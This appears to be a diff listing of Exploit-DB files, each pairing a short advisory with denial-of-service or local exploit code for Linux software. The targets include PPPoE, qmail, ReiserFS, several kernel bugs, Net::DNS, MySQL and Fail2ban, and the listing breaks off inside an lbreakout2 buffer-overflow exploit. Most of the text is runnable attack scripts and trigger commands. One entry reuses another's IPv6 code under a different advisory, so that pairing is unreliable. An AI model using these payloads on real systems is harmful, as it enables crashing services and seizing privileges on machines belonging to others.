0.00user 0.00system 6:01.87elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (102major+18minor)pagefaults 10swaps
--END---cut-----:timer.results
(System is Cyrix-6x86 @ 187 MHz, 32M physical ram, 64M swap.)
(^C was pressed after about a minute into the 800 deep one. Several system
programs died due to memory starvation. It took a quite a while afterwards
before the console regained any usabilty. When i tried to run startx, it
refused to start. xfs had died. everything looked odd. slow motion. i
think it was because of the loadavg)
# uptime
9:00pm up 2:14, 2 users, load average: 202.28, 363.68, 186.46

42
platforms/linux/dos/20494.pl Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/2098/info
Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.
PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.
This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section.
#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts('d:s:p:c',\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($port{p})){$port=$args{p};}else{&usage;}
if(defined($args{c})){$count=$args{c};}else{$count=10;}
sub randport(){
srand;
return $sport=(int rand 65510);
}
sub randsrc(){
srand;
return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255);
}
$packet = new Net::RawIP({ip=>{},tcp=>{}});
$packet->set({ ip => { saddr => $src,
daddr => $daddr,
tos => 3 },
tcp => { source => $sport,
dest => $port,
syn => 1, psh => 1 } });
$packet->send(0,$count);
sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }

7
platforms/linux/dos/20535.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/2180/info
ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained.
A problem has been reported in the handling of long file names with ReiserFS version 3.5.28 on SuSE Linux distribution 7.0. It is possible to create a directory with a long file name (the initial example displayed a directory with 768 characters), then attempt to list the file system using system binary ls or with built in shell function echo and create a Denial of Service. Upon attempting to list or echo the contents of the filesystem, a kernel buffer overflow occurs, overwriting variables on the stack including possibly the return address, as well as crashing the system. It may be possible for a malicious user to execute arbitrary code, deny service to legitimate users, and potentially break out of a chroot environment. This vulnerability is yet unverified.
mkdir "$(perl -e 'print "x" x 768')"

35
platforms/linux/dos/20561.pl Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;
if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
my $port = 25; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n");
while(<SKT>){
send(SKT,$infstr,0) || die "send() $!";
}
die "Connection lost!";

92
platforms/linux/dos/20562.c Executable file
View file

@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
/*
* qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
* amount of recipients.
*
* Usage: qmail-dos-2 fully-qualified-hostname
*
* Author: Wietse Venema. The author is not responsible for abuse of this
* program. Use at your own risk.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
void fatal(char *fmt,...)
{
va_list ap;
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}
chat(FILE * fp, char *fmt,...)
{
char buf[BUFSIZ];
va_list ap;
fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs("\r\n", fp);
if (fflush(fp))
fatal("connection lost");
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
if (atoi(buf) / 100 != 2)
fatal("%s", buf);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
char buf[BUFSIZ];
int sock;
FILE *fp;
if (argc != 2)
fatal("usage: %s host", argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal("host %s not found", argv[1]);
memset((char *) &sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
fatal("socket: %s", strerror(errno));
if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
fatal("connect to %s: %s", argv[1], strerror(errno));
if ((fp = fdopen(sock, "r+")) == 0)
fatal("fdopen: %s", strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
chat(fp, "mail from:<me@me>", fp);
for (;;)
chat(fp, "rcpt to:<me@%s>", argv[1]);
}

10
platforms/linux/dos/21262.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/4018/info
kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.

32
platforms/linux/dos/22105.c Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/6420/info
A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap().
It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped.
#define PAGES 10
#include <asm/page.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ptrace.h>
int main() {
int ad1,ad2,zer,mem,pid,i;
zer=open("/dev/zero",O_RDONLY);
ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0);
pid=getpid();
if (!fork()) {
char p[64];
ptrace(PTRACE_ATTACH,pid,0,0);
sleep(1);
sprintf(p,"/proc/%d/mem",pid);
mem=open(p,O_RDONLY);
ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1);
write(1,(char*)ad2,PAGES*PAGE_SIZE);
}
sleep(100);
return 0;
}

108
platforms/linux/dos/24078.c Executable file
View file

@ -0,0 +1,108 @@
source: http://www.securityfocus.com/bid/10264/info
PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled.
The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop.
/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
by Shadowinteger <shadowinteger@sentinix.org>
2004-05-04
Written after reading the security advisory posted by borg (ChrisR-) on
Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net
Acknowledgments: sabu (www.sabu.net)
Vulnerability:
PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
(function in mm/mmap.c) is vulnerable to a local Denial of Service attack
because of a bug that puts the kernel into an infinite loop.
Read the security advisory for more info:
http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0
Exploitation:
We need to get passed the following line of code in
arch_get_unmapped_area() to succeed with a DoS:
if (TASK_SIZE - len < addr) { ...
We do it like this:
TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL
DOSVAL is the value we'll use.
arch_get_unmapped_area() does the following:
if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
(TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.
A DOSVAL of e.g. 0x80000000 or above will work most times, no real need
for the funky calculation above.
There are quite a few functions available that are "front-ends" to
arch_get_unmapped_area(). This exploit uses good-old mmap().
Tiny DoS PoC:
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);}
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#define TASK_SIZE 0xc0000000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x04000000
#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)
int main() {
int fd = open("/dev/zero", O_RDONLY);
printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
"by Shadowinteger <shadowinteger@sentinix.org> 20040504\n"
"created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
"ChrisR -> www.cr-secure.net\n"
"\n"
"the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
"\n"
"greetz goes to: sabu (www.sabu.net)\n"
"\n"
"------------------------------------------------------------------------------\n"
"will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
"\n"
"if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n"
"are you sure you want to continue? [type Y to continue] ", DOSVAL);
fflush(stdout);
if (getchar() != 'Y') {
printf("aborted.\n");
return 0;
}
printf("\n"
"attempting to DoS...\n");
if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
perror("mmap");
}
printf("your kernel does not seem to be vulnerable! :)\n");
return 0;
}

11
platforms/linux/dos/26248.sh Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/14790/info
The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service.
A local attacker can exploit this vulnerability by making repeated reads to the '/proc/scsi/sg/devices' file, which will exhaust kernel memory and lead to a denial of service.
#!/bin/sh
while true; do
cat /proc/scsi/sg/devices > /dev/null
done

243
platforms/linux/dos/26382.c Executable file
View file

@ -0,0 +1,243 @@
source: http://www.securityfocus.com/bid/15156/info
Linux Kernel is reported prone to a local denial-of-service vulnerability.
This issue arises from an infinite loop when binding IPv6 UDP ports.
/*
* Linux kernel
* IPv6 UDP port selection infinite loop
* local denial of service vulnerability
* proof of concept code
* version 1.0 (Oct 29 2005)
* CVE ID: CAN-2005-2973
*
* by Remi Denis-Courmont < exploit at simphalempin dot com >
* http://www.simphalempin.com/dev/
*
* Vulnerable:
* - Linux < 2.6.14 with IPv6
*
* Not vulnerable:
* - Linux >= 2.6.14
* - Linux without IPv6
*
* Fix:
* http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;
* a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2
*/
/*****************************************************************************
* Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright notice, *
* this list of conditions and the following disclaimer. *
* 2. Redistribution in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* The author's liability shall not be incurred as a result of loss of due *
* the total or partial failure to fulfill anyone's obligations and direct *
* or consequential loss due to the software's use or performance. *
* *
* The current situation as regards scientific and technical know-how at the *
* time when this software was distributed did not enable all possible uses *
* to be tested and verified, nor for the presence of any or all faults to *
* be detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
* *
* The author does not either expressly or tacitly warrant that this *
* software does not infringe any or all third party intellectual right *
* relating to a patent, software or to any or all other property right. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
static int
bind_udpv6_port (uint16_t port)
{
int fd;
fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
if (fd != -1)
{
struct sockaddr_in6 addr;
int val = 1;
setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));
memset (&addr, 0, sizeof (addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons (port);
if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)
return fd;
close (fd);
}
return -1;
}
static int
get_fd_limit (void)
{
struct rlimit lim;
getrlimit (RLIMIT_NOFILE, &lim);
lim.rlim_cur = lim.rlim_max;
setrlimit (RLIMIT_NOFILE, &lim);
return (int)lim.rlim_max;
}
static void
get_port_range (uint16_t *range)
{
FILE *stream;
/* conservative defaults */
range[0] = 1024;
range[1] = 65535;
stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");
if (stream != NULL)
{
unsigned i[2];
if ((fscanf (stream, "%u %u", i, i + 1) == 2)
&& (i[0] <= i[1]) && (i[1] < 65535))
{
range[0] = (uint16_t)i[0];
range[1] = (uint16_t)i[1];
}
fclose (stream);
}
}
/* The criticial is fairly simple to raise : the infinite loop occurs when
* calling bind with no speficied port number (ie zero), if and only if the
* IPv6 stack cannot find any free UDP port within the local port range
* (normally 32768-61000). Because this requires times more sockets than what
* a process normally can open at a given time, we have to spawn several
* processes. Then, the simplest way to trigger the crash condition consists
* of opening up kernel-allocated UDP ports until it crashes, but that is
* fairly slow (because allocation are stored in small a hash table of lists,
* that are checked at each allocation). A much faster scheme involves getting
* the local port range from /proc, allocating one by one, and only then, ask
* for automatic (any/zero) port allocation.
*/
static int
proof (void)
{
int lim, val = 2;
pid_t pid, ppid;
uint16_t range[2], port;
lim = get_fd_limit ();
if (lim <= 3)
return -2;
get_port_range (range);
port = range[0];
ppid = getpid ();
puts ("Stage 1...");
do
{
switch (pid = fork ())
{
case 0:
for (val = 3; val < lim; val++)
close (val);
do
{
if (bind_udpv6_port (port) >= 0)
{
if (port)
port++;
}
else
if (port && (errno == EADDRINUSE))
port++; /* skip already used port */
else
if (errno != EMFILE)
/* EAFNOSUPPORT -> no IPv6 stack */
/* EADDRINUSE -> not vulnerable */
exit (1);
if (port > range[1])
{
puts ("Stage 2... should crash quickly");
port = 0;
}
}
while (errno != EMFILE);
break; /* EMFILE: spawn new process */
case -1:
exit (2);
default:
wait (&val);
if (ppid != getpid ())
exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);
}
}
while (pid == 0);
puts ("System not vulnerable");
return -val;
}
int
main (int argc, char *argv[])
{
setvbuf (stdout, NULL, _IONBF, 0);
puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n"
"proof of concept code\n"
"Copyright (C) 2005 Remi Denis-Courmont "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
return -proof ();
}

243
platforms/linux/dos/26489.c Executable file
View file

@ -0,0 +1,243 @@
source: http://www.securityfocus.com/bid/15365/info
Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.
This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed.
/*
* Linux kernel
* IPv6 UDP port selection infinite loop
* local denial of service vulnerability
* proof of concept code
* version 1.0 (Oct 29 2005)
* CVE ID: CAN-2005-2973
*
* by Remi Denis-Courmont < exploit at simphalempin dot com >
* http://www.simphalempin.com/dev/
*
* Vulnerable:
* - Linux < 2.6.14 with IPv6
*
* Not vulnerable:
* - Linux >= 2.6.14
* - Linux without IPv6
*
* Fix:
* http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;
* a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2
*/
/*****************************************************************************
* Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright notice, *
* this list of conditions and the following disclaimer. *
* 2. Redistribution in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* The author's liability shall not be incurred as a result of loss of due *
* the total or partial failure to fulfill anyone's obligations and direct *
* or consequential loss due to the software's use or performance. *
* *
* The current situation as regards scientific and technical know-how at the *
* time when this software was distributed did not enable all possible uses *
* to be tested and verified, nor for the presence of any or all faults to *
* be detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
* *
* The author does not either expressly or tacitly warrant that this *
* software does not infringe any or all third party intellectual right *
* relating to a patent, software or to any or all other property right. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
static int
bind_udpv6_port (uint16_t port)
{
int fd;
fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
if (fd != -1)
{
struct sockaddr_in6 addr;
int val = 1;
setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));
memset (&addr, 0, sizeof (addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons (port);
if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)
return fd;
close (fd);
}
return -1;
}
static int
get_fd_limit (void)
{
struct rlimit lim;
getrlimit (RLIMIT_NOFILE, &lim);
lim.rlim_cur = lim.rlim_max;
setrlimit (RLIMIT_NOFILE, &lim);
return (int)lim.rlim_max;
}
static void
get_port_range (uint16_t *range)
{
FILE *stream;
/* conservative defaults */
range[0] = 1024;
range[1] = 65535;
stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");
if (stream != NULL)
{
unsigned i[2];
if ((fscanf (stream, "%u %u", i, i + 1) == 2)
&& (i[0] <= i[1]) && (i[1] < 65535))
{
range[0] = (uint16_t)i[0];
range[1] = (uint16_t)i[1];
}
fclose (stream);
}
}
/* The criticial is fairly simple to raise : the infinite loop occurs when
* calling bind with no speficied port number (ie zero), if and only if the
* IPv6 stack cannot find any free UDP port within the local port range
* (normally 32768-61000). Because this requires times more sockets than what
* a process normally can open at a given time, we have to spawn several
* processes. Then, the simplest way to trigger the crash condition consists
* of opening up kernel-allocated UDP ports until it crashes, but that is
* fairly slow (because allocation are stored in small a hash table of lists,
* that are checked at each allocation). A much faster scheme involves getting
* the local port range from /proc, allocating one by one, and only then, ask
* for automatic (any/zero) port allocation.
*/
static int
proof (void)
{
int lim, val = 2;
pid_t pid, ppid;
uint16_t range[2], port;
lim = get_fd_limit ();
if (lim <= 3)
return -2;
get_port_range (range);
port = range[0];
ppid = getpid ();
puts ("Stage 1...");
do
{
switch (pid = fork ())
{
case 0:
for (val = 3; val < lim; val++)
close (val);
do
{
if (bind_udpv6_port (port) >= 0)
{
if (port)
port++;
}
else
if (port && (errno == EADDRINUSE))
port++; /* skip already used port */
else
if (errno != EMFILE)
/* EAFNOSUPPORT -> no IPv6 stack */
/* EADDRINUSE -> not vulnerable */
exit (1);
if (port > range[1])
{
puts ("Stage 2... should crash quickly");
port = 0;
}
}
while (errno != EMFILE);
break; /* EMFILE: spawn new process */
case -1:
exit (2);
default:
wait (&val);
if (ppid != getpid ())
exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);
}
}
while (pid == 0);
puts ("System not vulnerable");
return -val;
}
int
main (int argc, char *argv[])
{
setvbuf (stdout, NULL, _IONBF, 0);
puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n"
"proof of concept code\n"
"Copyright (C) 2005 Remi Denis-Courmont "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
return -proof ();
}

10
platforms/linux/dos/29683.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/22737/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to crash the kernel.
Linux kernel versions 2.6.x are vulnerable to this issue.
1. auditctl -w /etc/shadow
2. useradd userb

14
platforms/linux/dos/30430.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/25117/info
Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
ROOT LOGIN REFUSED hi FROM 1.2.3.4
where '1.2.3.4' is an IP address to be blocked.

22
platforms/linux/dos/30744.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/26353/info
MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
This issue affects MySQL 5.1.23 and prior versions.
mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');

39
platforms/linux/dos/30895.pl Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/26902/info
The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
Successfully exploiting this issue allows attackers to crash applications that use the affected module.
Net::DNS 0.60 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module
use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";
my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
my($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "Client $hishost said ``$newmsg''\n";
$sock->send($oldmsg);
$oldmsg = "[$hishost] $newmsg";
}
die "recv: $!";

7
platforms/linux/dos/35432.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46796/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35432.pcap

186
platforms/linux/local/23738.c Executable file
View file

@ -0,0 +1,186 @@
source: http://www.securityfocus.com/bid/9712/info
Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.
/*
* lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
* vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
* usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>
#define BSIZE 200
#define D_START 0xbfffffff
#define PATH "/usr/local/bin/lbreakout2"
void exec_vuln();
int tease();
int make_string(long ret_addr);
int bruteforce(long start);
void banner(char *argv);
char shellcode[]=
